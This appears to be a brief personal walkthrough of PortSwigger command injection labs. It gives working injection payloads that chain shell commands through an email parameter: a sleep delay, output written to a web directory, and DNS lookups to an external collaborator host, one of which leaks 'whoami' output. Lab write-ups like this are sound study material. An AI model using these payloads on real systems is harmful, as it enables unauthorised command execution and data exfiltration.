Portswigger Labs

Lab 1: Simple Case

Very simple. Check stock is vulnerable:

Lab 2: Time Delay via Sleep

To solve, cause a 10 second delay. There is a 'Submit feedback' function.

Test each parameter, and find that using the concat function || works with the email parameter.

`email=test@test.com||sleep+10

Lab 3: Output Redirection

Blind OS command execution, and response is not returned. To solve, execute whoami and retrieve output.

This lab gives us a writeable directory at /var/www/images. Pretty straightforward.

Abusing the email parameter again, just do ||whoami>/var/www/images/test.txt. When the home page is loaded, I saw that it uses a filename parameter:

Using this, change it to filename=test.txt to solve the lab.

Lab 4: Out of Band Interaction

This is pretty simple. One can use curl or wget to trigger a response to an external server. Since the lab requires a DNS lookup to be done, use nslookup.

email=x||nslookup+burp.URL||

Lab 5: Out of Band Exfiltration

One can use a template literal ` to solve this.

email=test||nslookup+`whoami`.URL||`

Last updated